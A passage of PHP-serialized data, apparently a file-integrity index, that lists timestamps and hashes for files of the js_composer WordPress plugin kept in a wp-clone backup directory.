p-clone/wpclone_backup/wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-qtranslate.php";a:2:{s:1:"d";i:1517159300;s:1:"h";s:32:"cc56a58df350d73e4e39e618964cd289";}s:135:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-revslider.php";a:2:{s:1:"d";i:1517159300;s:1:"h";s:32:"3d3eec9a1b0bca560364f5391d93a377";}s:137:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-woocommerce.php";a:2:{s:1:"d";i:1517159300;s:1:"h";s:32:"c384e5a43b6a88a09324ad1a4c27d5b1";}s:130:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-wpml.php";a:2:{s:1:"d";i:1517159300;s:1:"h";s:32:"ef2749b9d84c1adda90ba9cc660bc280";}s:135:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-yoast_seo.php";a:2:{s:1:"d";i:1517159300;s:1:"h";s:32:"4e67a5ae269b81726eb1dd292085dfe4";}s:158:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/classes/vendors/plugins/woocommerce/class-vc-gitem-woocommerce-shortcode.php";a:2:{s:1:"d";i:1517159300;s:1:"h";s:32:"75fb22499739eb1c1244cfae4c0a29d5";}s:142:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/classes/vendors/plugins/woocommerce/grid-item-attributes.php";a:2:{s:1:"d";i:1517159300;s:1:"h";s:32:"15f1e838b45dd13ae5226022ac8b099e";}s:139:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/classes/vendors/plugins/woocommerce/grid-item-filters.php";a:2:{s:1:"d";i:1517159300;s:1:"h";s:32:"e106c25b90e309230f64ae772519cfe2";}s:142:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/classes/vendors/plugins/woocommerce/grid-item-shortcodes.php";a:2:{s:1:"d";i:1517159300;s:1:"h";s:32:"1660e2444432fdcca4989ac995793b5d";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/helpers/class-vc-color-helper.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"71822d9080eef61df6f43cee9a718997";}s:101:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/helpers/filters.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"b7a4d3abf1637e947a8042b892f9636c";}s:101:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/helpers/helpers.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"0645cfe1d2bf428db0322239ac30f215";}s:105:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/helpers/helpers_api.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"a278cc59f53d4fbd1d509956ced29b93";}s:112:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/helpers/helpers_deprecated.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"748a635d4a92952cb885b4c3bb84a4c9";}s:109:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/helpers/helpers_factory.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"11aa0216780e44d08663d9e63c96158d";}s:124:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/animation_style/animation_style.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"ba915af7b8439cde0a5465bab5c81b88";}s:118:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/autocomplete/autocomplete.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"87d14ea880d4e0f1a1df449a31ed17ca";}s:116:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/colorpicker/colorpicker.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"c80c753116e8de666550e9100daea1a2";}s:120:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/column_offset/column_offset.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"c0c80def86a77e4f7c23d11f622e9f82";}s:114:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/css_editor/css_editor.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"25261d50316f510b67235ff17ed07028";}s:120:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/custom_markup/custom_markup.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"d05c768a45f552157a8a13d60a3c6cc9";}s:107:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/default_params.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"7ffa916939e4537e2bdbc52f61683322";}s:104:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/el_id/el_id.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"65afcddbb2780319f2566c2017a70414";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/font_container/font_container.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"b70d0743862a4de87b47a6acd7721fde";}s:118:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/google_fonts/google_fonts.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"f7a2be66c7b16816adbb83580e6324a4";}s:106:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/hidden/hidden.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"60c1a3563ad2e46e1dc3188fc3e8635c";}s:102:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/href/href.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"e8d735a21a70ba6f435089561ad453e9";}s:114:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/iconpicker/iconpicker.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"9e138af512e0be1f9b0cd4c892b1f200";}s:97:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/load.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"d60614159aa7685cdf58bb4a385a352f";}s:102:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/loop/loop.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"6c32db8877eb2a9f738a48a0ee02a6ac";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/options/options.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"365e687998971dd599fd090b16cd8b1c";}s:116:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/param_group/param_group.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"26bfa80c26722dd4b4af50d3b5ab8275";}s:99:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/params.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"f335f9309382da88d28e8849a79e23ae";}s:120:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/params_preset/params_preset.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"d475650a3bae91e802eb3f456f580683";}s:116:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/sorted_list/sorted_list.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"146425d506bfd7df6e4d80e3c1a6c489";}s:106:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/tab_id/tab_id.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"ad78d4a897d85295ace7b9e87fbc5922";}s:120:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/textarea_html/textarea_html.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"f8244e8bb2f2a5d3bc61ed1c33d28c25";}s:124:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/vc_grid_element/vc_grid_element.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"855c43869700d8f698c24bc01ed55364";}s:130:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/vc_grid_element/vc_grid_id/vc_grid_id.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"377180820128d065b9cfb202f9c3485c";}s:116:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/vc_grid_item/attributes.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"96b8f5275f7543261beb856b602b6cdd";}s:124:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/vc_grid_item/class-vc-grid-item.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"03838c553a624f8ee815e7505adac36d";}s:129:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/vc_grid_item/class-wpb-map-grid-item.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"ba31573282da2f2295314f36c44c6a3d";}s:138:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/vc_grid_item/editor/class-vc-grid-item-editor.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"6530efaf31a82373430414e10edfb740";}s:139:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/vc_grid_item/editor/class-vc-grid-item-preview.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"3961557515ebd9a0bdb0fc615943703e";}s:145:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/vc_grid_item/editor/navbar/class-vc-navbar-grid-item.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"9cf8e182c1d3228da39d37262ad2a68c";}s:154:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/vc_grid_item/editor/popups/class-vc-add-element-box-grid-item.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"513ee82b5f86b3800fb1632d7c6342d1";}s:155:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/vc_grid_item/editor/popups/class-vc-templates-editor-grid-item.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"928ae1d4618775d041d8d49c4d0fe14e";}s:116:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/vc_grid_item/shortcodes.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"7542ca074b8f66ca3a04f7623ad530c9";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/vc_grid_item/templates.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"a605811ed63ab99b34b85897a58e5b2c";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/params/vc_link/vc_link.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"3200453b9b4fae37eb9fe626de939c7a";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/backend_editor.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"4567e163a7ee4bed8efabc61d98ab484";}s:123:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/frontend_editor.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"5eca0e450471af81bcbe3df7d9b5f3cb";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/frontend_template.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"13c4f41b695b332fadb0a2e2364d115b";}s:121:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/navbar/navbar.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"a62f96b28f1008c422de6e103b4ae466";}s:134:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/partials/access-manager-js.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"7e21c26a30976ff0f1484d364d319b73";}s:135:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/partials/add_element_search.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"70fe1fbdcb11b79bebfac7af7e09324b";}s:133:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/partials/add_element_tabs.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"8187c5d2a574abff981870fe8c5230ce";}s:145:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/partials/backend-shortcodes-templates.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"68b47d48ffd31f5f40adff24e1bbf906";}s:133:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/partials/backend_controls.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"fa86837c0056001e6de901380bf1c08e";}s:137:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/partials/backend_controls_tab.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"204dedb6f5c577fb09f087cbcc5097e0";}s:138:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/partials/backend_editor_footer.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"5e53d188ee226f120a4799324270138b";}s:134:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/partials/frontend_controls.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"4a02aa837c8497765fd63a98bcaec607";}s:132:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/partials/post_shortcodes.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"8020a5b6bd7517957029f757650608bf";}s:131:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/partials/prompt-presets.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"04625201bedd3a0cf9aadf0f93acabc3";}s:133:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/partials/prompt-templates.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"541a9e168cbbe72a42988fa33d3b82dc";}s:139:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/partials/settings_presets_popup.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"28b3a2e8cc3e5139b7e8c5f88a114b34";}s:133:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/partials/templates_search.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"89ba7ebe2a27d0dbe8042eff385fc4fa";}s:140:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/partials/vc_settings-image-block.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"b0ce65278df66b775459f0d4cee84312";}s:140:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/partials/vc_ui-settings-dropdown.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"666ff35a863852cc23e35b4d52ff2230";}s:137:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/partials/vc_ui-templates-tabs.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"ba597e5062425b5277c73fc68b85e21e";}s:133:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/partials/vc_welcome_block.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"407f3d865d0f2d88f125b563394d1e4a";}s:133:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/popups/modal_edit_element.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"9367a9f1080ab78bda2ef96702b12b61";}s:146:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/popups/panel_multi_shortcode_edit_form.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"b13b246f79f1ae51368edd4a62fbf71b";}s:140:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/popups/panel_shortcode_edit_form.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"f52c8587a971981b2db1edc568fafde0";}s:140:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/popups/shared-templates/category.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"0539c0b83f4570c43642e9be6621cda4";}s:127:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-footer.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"f2a584af570d6974c6d8f1e5ffabcc05";}s:127:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-header.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"44e7cdaab1712f7854b7f0753a3ff256";}s:138:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-add-element.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"af0fcdc6e7859ab9359bec0c991787c7";}s:139:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-edit-element.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"ead959733bd689de6b5a9915d9c1dbff";}s:140:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-post-settings.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"a5c6531cfcca72788a37e0ffff6338e7";}s:133:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-preset.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"2b3825c57aeba0c1d6dc041639e28197";}s:137:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-row-layout.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"3bdd1ecd39130d7d920c305aaede8f9a";}s:136:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-templates.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"fcb6984f37833732c11b385b92c75ae4";}s:130:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/editors/vc_ui-template-preview.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"8f990f9223d3a643563f7fc5b18f6496";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/pages/partials/_settings_tabs.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"799363f690ab7fe06dd50432ce310914";}s:116:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/pages/partials/_tabs.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"2fdbf175f2d218e54f76a16431ff0104";}s:145:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_backend_editor.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"e0954ff16ccc8a5821532e73d39695c5";}s:140:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_dragndrop.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"5cbef35dccc229680739093c8522cc8f";}s:146:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_frontend_editor.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"95c9c4a511e2f0a8e3db1e74be3c0373";}s:143:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_grid_builder.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"cd776ea5fec3bdb198840d50a4871031";}s:135:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_part.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"1bed710c9dcdf8e52acb7446be7c0c46";}s:144:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_post_settings.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"c2d9cc8b11920528a8ef9c6e77f24fae";}s:141:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_post_types.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"a01e21efbb516e2ed0e7c16ebd9762cb";}s:138:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_presets.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"f786609459125219e0f4dc72ddaee2ee";}s:139:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_settings.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"c80a54f3f607d52b293136dcb397a9ac";}s:141:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_shortcodes.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"ea0a86590a26f4e6fffd0813a1e51dd1";}s:140:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_templates.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"9fb790dc78633a61b8e7e0a223c60eeb";}s:144:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/pages/vc-settings/default-template-post-type.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"2994727e8fab496b96cf80fbdb1467e9";}s:119:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/pages/vc-settings/index.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"4cdc68e6c0baebc9724a23295bd75bde";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/pages/vc-settings/tab-vc-roles.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"eeba2065fa4edd9b1c085e5f5a69f66f";}s:117:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/pages/vc-settings/tab.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"45b10b428552aa92713eacf88bc86f59";}s:127:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/pages/vc-settings/vc-automapper.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"1c8d19ad365cbf591ff6989b232a5282";}s:118:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/pages/vc-welcome/index.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"64b08f372dd304c6539f06a104eb660b";}s:119:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/pages/vc-welcome/vc-faq.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"3facbca07daa79a2d630a8472825390b";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/pages/vc-welcome/vc-resources.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"511e47c06b8a08d7f5d3f6d886542583";}s:123:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/pages/vc-welcome/vc-welcome.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"ec22fea2534059baeb0cd0e92c779d6b";}s:129:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/params/column_offset/template.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"5b0ec5b4a271aaed84ac8ef4cd1e7855";}s:124:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/params/google_fonts/template.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"b76c374677e860dca62383a49c2490bb";}s:118:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/params/loop/templates.html";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"4a2a7521926dbe49db9ee600e7525720";}s:121:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/params/options/templates.html";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"4c9043896f9edd91cfe7235f3d91abeb";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/params/param_group/add.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"d4e8bc779ffa6a950089059b5340631d";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/params/param_group/content.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"5ccf08a0c017f630bf54bf98b87c53a1";}s:132:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/params/param_group/inner_content.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"02443dc560eeccb63ea7e5b3cea0a253";}s:141:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/attributes/featured_image.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"4025ee9641f3e0465c3bf1015d9e602a";}s:142:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/attributes/post_categories.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"3de8253f371ffb6e214d42955a104a98";}s:133:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/attributes/vc_btn.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"b952f9272b289d65b80f35c6d70e8dcf";}s:162:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/editor/partials/vc_grid_item_editor_footer.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"8a0cd28244de108a74c600b3e1cceac9";}s:146:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/editor/vc_grid_item_editor.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"722693cc46bf701c442d8ca260b05e91";}s:149:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/editor/vc_ui-template-preview.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"63039abe488248f606851bfdfbd36efe";}s:127:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/preview.tpl.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"f9088edad7584f6ccde49d7fcd4d887d";}s:133:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_btn.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"49f9bbbdf02b816a0bcd33f7fcb7425d";}s:137:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_button2.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"74e03ac7679e11957dd6282cb31a6c41";}s:144:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_custom_heading.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"d5e67d519090a604931e38acd5a774a9";}s:134:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_icon.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"ceaf8d17e8cc61b16f2b3e387e0c89ff";}s:142:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_single_image.php";a:2:{s:1:"d";i:1517159301;s:1:"h";s:32:"1a2ba64de921ca3027b069082eb8ba4e";}s:121:"wp-content/uploads/wp-clone/w